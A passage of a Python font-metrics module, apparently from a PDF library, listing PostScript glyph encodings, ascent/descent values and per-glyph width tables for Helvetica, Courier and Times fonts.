'Phi', 'Gamma', 'Eta', 'Iota', 'theta1', 'Kappa', 'Lambda', 'Mu', 'Nu', 'Omicron', 'Pi', 'Theta',
'Rho', 'Sigma', 'Tau', 'Upsilon', 'sigma1', 'Omega', 'Xi', 'Psi', 'Zeta', 'bracketleft',
'therefore', 'bracketright', 'perpendicular', 'underscore', 'radicalex', 'alpha', 'beta', 'chi',
'delta', 'epsilon', 'phi', 'gamma', 'eta', 'iota', 'phi1', 'kappa', 'lambda', 'mu', 'nu',
'omicron', 'pi', 'theta', 'rho', 'sigma', 'tau', 'upsilon', 'omega1', 'omega', 'xi', 'psi', 'zeta',
'braceleft', 'bar', 'braceright', 'similar', None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'Euro', 'Upsilon1', 'minute', 'lessequal',
'fraction', 'infinity', 'florin', 'club', 'diamond', 'heart', 'spade', 'arrowboth', 'arrowleft',
'arrowup', 'arrowright', 'arrowdown', 'degree', 'plusminus', 'second', 'greaterequal', 'multiply',
'proportional', 'partialdiff', 'bullet', 'divide', 'notequal', 'equivalence', 'approxequal',
'ellipsis', 'arrowvertex', 'arrowhorizex', 'carriagereturn', 'aleph', 'Ifraktur', 'Rfraktur',
'weierstrass', 'circlemultiply', 'circleplus', 'emptyset', 'intersection', 'union',
'propersuperset', 'reflexsuperset', 'notsubset', 'propersubset', 'reflexsubset', 'element',
'notelement', 'angle', 'gradient', 'registerserif', 'copyrightserif', 'trademarkserif', 'product',
'radical', 'dotmath', 'logicalnot', 'logicaland', 'logicalor', 'arrowdblboth', 'arrowdblleft',
'arrowdblup', 'arrowdblright', 'arrowdbldown', 'lozenge', 'angleleft', 'registersans',
'copyrightsans', 'trademarksans', 'summation', 'parenlefttp', 'parenleftex', 'parenleftbt',
'bracketlefttp', 'bracketleftex', 'bracketleftbt', 'bracelefttp', 'braceleftmid', 'braceleftbt',
'braceex', None, 'angleright', 'integral', 'integraltp', 'integralex', 'integralbt',
'parenrighttp', 'parenrightex', 'parenrightbt', 'bracketrighttp', 'bracketrightex',
'bracketrightbt', 'bracerighttp', 'bracerightmid', 'bracerightbt', None)
encodings['ZapfDingbatsEncoding'] = ( None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
'space', 'a1', 'a2', 'a202', 'a3', 'a4', 'a5', 'a119', 'a118', 'a117', 'a11', 'a12', 'a13', 'a14',
'a15', 'a16', 'a105', 'a17', 'a18', 'a19', 'a20', 'a21', 'a22', 'a23', 'a24', 'a25', 'a26', 'a27',
'a28', 'a6', 'a7', 'a8', 'a9', 'a10', 'a29', 'a30', 'a31', 'a32', 'a33', 'a34', 'a35', 'a36',
'a37', 'a38', 'a39', 'a40', 'a41', 'a42', 'a43', 'a44', 'a45', 'a46', 'a47', 'a48', 'a49', 'a50',
'a51', 'a52', 'a53', 'a54', 'a55', 'a56', 'a57', 'a58', 'a59', 'a60', 'a61', 'a62', 'a63', 'a64',
'a65', 'a66', 'a67', 'a68', 'a69', 'a70', 'a71', 'a72', 'a73', 'a74', 'a203', 'a75', 'a204', 'a76',
'a77', 'a78', 'a79', 'a81', 'a82', 'a83', 'a84', 'a97', 'a98', 'a99', 'a100', None, 'a89', 'a90',
'a93', 'a94', 'a91', 'a92', 'a205', 'a85', 'a206', 'a86', 'a87', 'a88', 'a95', 'a96', None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, 'a101', 'a102', 'a103', 'a104', 'a106', 'a107', 'a108', 'a112', 'a111', 'a110', 'a109',
'a120', 'a121', 'a122', 'a123', 'a124', 'a125', 'a126', 'a127', 'a128', 'a129', 'a130', 'a131',
'a132', 'a133', 'a134', 'a135', 'a136', 'a137', 'a138', 'a139', 'a140', 'a141', 'a142', 'a143',
'a144', 'a145', 'a146', 'a147', 'a148', 'a149', 'a150', 'a151', 'a152', 'a153', 'a154', 'a155',
'a156', 'a157', 'a158', 'a159', 'a160', 'a161', 'a163', 'a164', 'a196', 'a165', 'a192', 'a166',
'a167', 'a168', 'a169', 'a170', 'a171', 'a172', 'a173', 'a162', 'a174', 'a175', 'a176', 'a177',
'a178', 'a179', 'a193', 'a180', 'a199', 'a181', 'a200', 'a182', None, 'a201', 'a183', 'a184',
'a197', 'a185', 'a194', 'a198', 'a186', 'a195', 'a187', 'a188', 'a189', 'a190', 'a191', None)
encodings['StandardEncoding']=(None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,"space","exclam",
"quotedbl","numbersign","dollar","percent","ampersand","quoteright","parenleft","parenright","asterisk","plus",
"comma","hyphen","period","slash","zero","one","two","three","four","five","six","seven","eight","nine","colon",
"semicolon","less","equal","greater","question","at","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O",
"P","Q","R","S","T","U","V","W","X","Y","Z","bracketleft","backslash","bracketright","asciicircum","underscore",
"quoteleft","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y",
"z","braceleft","bar","braceright","asciitilde",None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,
None,None,None,"exclamdown","cent","sterling","fraction","yen","florin","section","currency","quotesingle","quotedblleft",
"guillemotleft","guilsinglleft","guilsinglright","fi","fl",None,"endash","dagger","daggerdbl","periodcentered",None,
"paragraph","bullet","quotesinglbase","quotedblbase","quotedblright","guillemotright","ellipsis","perthousand",
None,"questiondown",None,"grave","acute","circumflex","tilde","macron","breve","dotaccent","dieresis",None,"ring",
"cedilla",None,"hungarumlaut","ogonek","caron","emdash",None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,"AE",None,"ordfeminine",
None,None,None,None,"Lslash","Oslash","OE","ordmasculine",None,None,None,None,None,"ae",None,None,None,"dotlessi",None,None,"lslash","oslash",
"oe","germandbls",None,None,None,None)
encodings['PDFDocEncoding']=(None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,
None,None,None,None,None,"breve","caron","circumflex",
"dotaccent","hungarumlaut","ogonek","ring","tilde","space","exclam","quotedbl","numbersign","dollar","percent",
"ampersand","quotesingle","parenleft","parenright","asterisk","plus","comma","hyphen","period","slash","zero",
"one","two","three","four","five","six","seven","eight","nine","colon","semicolon","less","equal","greater",
"question","at","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X",
"Y","Z","bracketleft","backslash","bracketright","asciicircum","underscore","grave","a","b","c","d","e","f","g",
"h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","braceleft","bar","braceright",
"asciitilde",None,"bullet","dagger","daggerdbl","ellipsis","emdash","endash","florin","fraction","guilsinglleft",
"guilsinglright","minus","perthousand","quotedblbase","quotedblleft","quotedblright","quoteleft","quoteright",
"quotesinglbase","trademark","fi","fl","Lslash","OE","Scaron","Ydieresis","Zcaron","dotlessi","lslash","oe",
"scaron","zcaron",None,"Euro","exclamdown","cent","sterling","currency","yen","brokenbar","section","dieresis",
"copyright","ordfeminine","guillemotleft","logicalnot",None,"registered","macron","degree","plusminus","twosuperior",
"threesuperior","acute","mu","paragraph","periodcentered","cedilla","onesuperior","ordmasculine","guillemotright",
"onequarter","onehalf","threequarters","questiondown","Agrave","Aacute","Acircumflex","Atilde","Adieresis","Aring",
"AE","Ccedilla","Egrave","Eacute","Ecircumflex","Edieresis","Igrave","Iacute","Icircumflex","Idieresis","Eth",
"Ntilde","Ograve","Oacute","Ocircumflex","Otilde","Odieresis","multiply","Oslash","Ugrave","Uacute","Ucircumflex",
"Udieresis","Yacute","Thorn","germandbls","agrave","aacute","acircumflex","atilde","adieresis","aring","ae",
"ccedilla","egrave","eacute","ecircumflex","edieresis","igrave","iacute","icircumflex","idieresis","eth","ntilde",
"ograve","oacute","ocircumflex","otilde","odieresis","divide","oslash","ugrave","uacute","ucircumflex","udieresis",
"yacute","thorn","ydieresis")
encodings['MacExpertEncoding'] = (None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
'space', 'exclamsmall', 'Hungarumlautsmall', 'centoldstyle', 'dollaroldstyle', 'dollarsuperior', 'ampersandsmall',
'Acutesmall', 'parenleftsuperior', 'parenrightsuperior', 'twodotenleader', 'onedotenleader', 'comma', 'hyphen',
'period', 'fraction', 'zerooldstyle', 'oneoldstyle', 'twooldstyle', 'threeoldstyle', 'fouroldstyle',
'fiveoldstyle', 'sixoldstyle', 'sevenoldstyle', 'eightoldstyle', 'nineoldstyle', 'colon', 'semicolon', None,
'threequartersemdash', None, 'questionsmall', None, None, None, None, 'Ethsmall', None, None, 'onequarter',
'onehalf', 'threequarters', 'oneeighth', 'threeeighths', 'fiveeighths', 'seveneighths', 'onethird', 'twothirds',
None, None, None, None, None, None, 'ff', 'fi', 'fl', 'ffi', 'ffl', 'parenleftinferior', None,
'parenrightinferior', 'Circumflexsmall', 'hypheninferior', 'Gravesmall', 'Asmall', 'Bsmall', 'Csmall', 'Dsmall',
'Esmall', 'Fsmall', 'Gsmall', 'Hsmall', 'Ismall', 'Jsmall', 'Ksmall', 'Lsmall', 'Msmall', 'Nsmall', 'Osmall',
'Psmall', 'Qsmall', 'Rsmall', 'Ssmall', 'Tsmall', 'Usmall', 'Vsmall', 'Wsmall', 'Xsmall', 'Ysmall', 'Zsmall',
'colonmonetary', 'onefitted', 'rupiah', 'Tildesmall', None, None, 'asuperior', 'centsuperior', None, None, None,
None, 'Aacutesmall', 'Agravesmall', 'Acircumflexsmall', 'Adieresissmall', 'Atildesmall', 'Aringsmall',
'Ccedillasmall', 'Eacutesmall', 'Egravesmall', 'Ecircumflexsmall', 'Edieresissmall', 'Iacutesmall', 'Igravesmall',
'Icircumflexsmall', 'Idieresissmall', 'Ntildesmall', 'Oacutesmall', 'Ogravesmall', 'Ocircumflexsmall',
'Odieresissmall', 'Otildesmall', 'Uacutesmall', 'Ugravesmall', 'Ucircumflexsmall', 'Udieresissmall', None,
'eightsuperior', 'fourinferior', 'threeinferior', 'sixinferior', 'eightinferior', 'seveninferior', 'Scaronsmall',
None, 'centinferior', 'twoinferior', None, 'Dieresissmall', None, 'Caronsmall', 'osuperior', 'fiveinferior', None,
'commainferior', 'periodinferior', 'Yacutesmall', None, 'dollarinferior', None, None, 'Thornsmall', None,
'nineinferior', 'zeroinferior', 'Zcaronsmall', 'AEsmall', 'Oslashsmall', 'questiondownsmall', 'oneinferior',
'Lslashsmall', None, None, None, None, None, None, 'Cedillasmall', None, None, None, None, None, 'OEsmall',
'figuredash', 'hyphensuperior', None, None, None, None, 'exclamdownsmall', None, 'Ydieresissmall', None,
'onesuperior', 'twosuperior', 'threesuperior', 'foursuperior', 'fivesuperior', 'sixsuperior', 'sevensuperior',
'ninesuperior', 'zerosuperior', None, 'esuperior', 'rsuperior', 'tsuperior', None, None, 'isuperior', 'ssuperior',
'dsuperior', None, None, None, None, None, 'lsuperior', 'Ogoneksmall', 'Brevesmall', 'Macronsmall', 'bsuperior',
'nsuperior', 'msuperior', 'commasuperior', 'periodsuperior', 'Dotaccentsmall', 'Ringsmall', None, None, None, None)
# Standard font name -> (ascent, descent); descent is negative.
# NOTE(review): presumably in 1/1000-em font units, and Symbol /
# ZapfDingbats are simply recorded as (0, 0) — confirm against the AFMs.
ascent_descent = {
    'Courier': (629, -157),
    'Courier-Bold': (626, -142),
    'Courier-BoldOblique': (626, -142),
    'Courier-Oblique': (629, -157),
    'Helvetica': (718, -207),
    'Helvetica-Bold': (718, -207),
    'Helvetica-BoldOblique': (718, -207),
    'Helvetica-Oblique': (718, -207),
    'Times-Roman': (683, -217),
    'Times-Bold': (676, -205),
    'Times-BoldItalic': (699, -205),
    'Times-Italic': (683, -205),
    'Symbol': (0, 0),
    'ZapfDingbats': (0, 0)
    }
# fontname -> {glyphname: width} (see module docstring); populated by the
# per-font dict assignments that follow.
widthsByFontGlyph = {}
widthsByFontGlyph['Helvetica'] = {'A': 667,
'AE': 1000,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 500,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 667,
'aring': 556,
'asciicircum': 469,
'asciitilde': 584,
'asterisk': 389,
'at': 1015,
'atilde': 556,
'b': 556,
'backslash': 278,
'bar': 260,
'braceleft': 334,
'braceright': 334,
'bracketleft': 278,
'bracketright': 278,
'breve': 333,
'brokenbar': 260,
'bullet': 350,
'c': 500,
'caron': 333,
'ccedilla': 500,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 278,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 556,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 556,
'exclam': 278,
'exclamdown': 333,
'f': 278,
'fi': 500,
'five': 556,
'fl': 500,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 556,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 222,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 222,
'k': 500,
'l': 222,
'less': 584,
'logicalnot': 584,
'lslash': 222,
'm': 833,
'macron': 333,
'minus': 584,
'mu': 556,
'multiply': 584,
'n': 556,
'nine': 556,
'ntilde': 556,
'numbersign': 556,
'o': 556,
'oacute': 556,
'ocircumflex': 556,
'odieresis': 556,
'oe': 944,
'ogonek': 333,
'ograve': 556,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 556,
'p': 556,
'paragraph': 537,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 556,
'question': 556,
'questiondown': 611,
'quotedbl': 355,
'quotedblbase': 333,
'quotedblleft': 333,
'quotedblright': 333,
'quoteleft': 222,
'quoteright': 222,
'quotesinglbase': 222,
'quotesingle': 191,
'r': 333,
'registered': 737,
'ring': 333,
's': 500,
'scaron': 500,
'section': 556,
'semicolon': 278,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 278,
'thorn': 556,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 556,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-Bold'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 722,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 556,
'K': 722,
'L': 611,
'Lslash': 611,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 722,
'aring': 556,
'asciicircum': 584,
'asciitilde': 584,
'asterisk': 389,
'at': 975,
'atilde': 556,
'b': 611,
'backslash': 278,
'bar': 280,
'braceleft': 389,
'braceright': 389,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 280,
'bullet': 350,
'c': 556,
'caron': 333,
'ccedilla': 556,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 333,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 611,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 611,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 611,
'five': 556,
'fl': 611,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 611,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 611,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 556,
'l': 278,
'less': 584,
'logicalnot': 584,
'lslash': 278,
'm': 889,
'macron': 333,
'minus': 584,
'mu': 611,
'multiply': 584,
'n': 611,
'nine': 556,
'ntilde': 611,
'numbersign': 556,
'o': 611,
'oacute': 611,
'ocircumflex': 611,
'odieresis': 611,
'oe': 944,
'ogonek': 333,
'ograve': 611,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 611,
'p': 611,
'paragraph': 556,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 611,
'question': 611,
'questiondown': 611,
'quotedbl': 474,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 278,
'quoteright': 278,
'quotesinglbase': 278,
'quotesingle': 238,
'r': 389,
'registered': 737,
'ring': 333,
's': 556,
'scaron': 556,
'section': 556,
'semicolon': 333,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 333,
'thorn': 611,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 611,
'uacute': 611,
'ucircumflex': 611,
'udieresis': 611,
'ugrave': 611,
'underscore': 556,
'v': 556,
'w': 778,
'x': 556,
'y': 556,
'yacute': 556,
'ydieresis': 556,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-Oblique'] = {'A': 667,
'AE': 1000,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 500,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 667,
'aring': 556,
'asciicircum': 469,
'asciitilde': 584,
'asterisk': 389,
'at': 1015,
'atilde': 556,
'b': 556,
'backslash': 278,
'bar': 260,
'braceleft': 334,
'braceright': 334,
'bracketleft': 278,
'bracketright': 278,
'breve': 333,
'brokenbar': 260,
'bullet': 350,
'c': 500,
'caron': 333,
'ccedilla': 500,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 278,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 556,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 556,
'exclam': 278,
'exclamdown': 333,
'f': 278,
'fi': 500,
'five': 556,
'fl': 500,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 556,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 222,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 222,
'k': 500,
'l': 222,
'less': 584,
'logicalnot': 584,
'lslash': 222,
'm': 833,
'macron': 333,
'minus': 584,
'mu': 556,
'multiply': 584,
'n': 556,
'nine': 556,
'ntilde': 556,
'numbersign': 556,
'o': 556,
'oacute': 556,
'ocircumflex': 556,
'odieresis': 556,
'oe': 944,
'ogonek': 333,
'ograve': 556,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 556,
'p': 556,
'paragraph': 537,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 556,
'question': 556,
'questiondown': 611,
'quotedbl': 355,
'quotedblbase': 333,
'quotedblleft': 333,
'quotedblright': 333,
'quoteleft': 222,
'quoteright': 222,
'quotesinglbase': 222,
'quotesingle': 191,
'r': 333,
'registered': 737,
'ring': 333,
's': 500,
'scaron': 500,
'section': 556,
'semicolon': 278,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 278,
'thorn': 556,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 556,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-BoldOblique'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 722,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 556,
'K': 722,
'L': 611,
'Lslash': 611,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 722,
'aring': 556,
'asciicircum': 584,
'asciitilde': 584,
'asterisk': 389,
'at': 975,
'atilde': 556,
'b': 611,
'backslash': 278,
'bar': 280,
'braceleft': 389,
'braceright': 389,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 280,
'bullet': 350,
'c': 556,
'caron': 333,
'ccedilla': 556,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 333,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 611,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 611,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 611,
'five': 556,
'fl': 611,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 611,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 611,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 556,
'l': 278,
'less': 584,
'logicalnot': 584,
'lslash': 278,
'm': 889,
'macron': 333,
'minus': 584,
'mu': 611,
'multiply': 584,
'n': 611,
'nine': 556,
'ntilde': 611,
'numbersign': 556,
'o': 611,
'oacute': 611,
'ocircumflex': 611,
'odieresis': 611,
'oe': 944,
'ogonek': 333,
'ograve': 611,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 611,
'p': 611,
'paragraph': 556,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 611,
'question': 611,
'questiondown': 611,
'quotedbl': 474,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 278,
'quoteright': 278,
'quotesinglbase': 278,
'quotesingle': 238,
'r': 389,
'registered': 737,
'ring': 333,
's': 556,
'scaron': 556,
'section': 556,
'semicolon': 333,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 333,
'thorn': 611,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 611,
'uacute': 611,
'ucircumflex': 611,
'udieresis': 611,
'ugrave': 611,
'underscore': 556,
'v': 556,
'w': 778,
'x': 556,
'y': 556,
'yacute': 556,
'ydieresis': 556,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
# All four Courier faces are monospaced at 600 units per glyph, so one width
# table (covering the same glyph set as Helvetica) is built once and the very
# same dict object is shared between the four font entries.
_w = dict.fromkeys(widthsByFontGlyph['Helvetica'], 600)
widthsByFontGlyph['Courier'] = _w
widthsByFontGlyph['Courier-Bold'] = _w
widthsByFontGlyph['Courier-Oblique'] = _w
widthsByFontGlyph['Courier-BoldOblique'] = _w
widthsByFontGlyph['Times-Roman'] = {'A': 722,
'AE': 889,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 667,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 611,
'Eacute': 611,
'Ecircumflex': 611,
'Edieresis': 611,
'Egrave': 611,
'Eth': 722,
'Euro': 500,
'F': 556,
'G': 722,
'H': 722,
'I': 333,
'Iacute': 333,
'Icircumflex': 333,
'Idieresis': 333,
'Igrave': 333,
'J': 389,
'K': 722,
'L': 611,
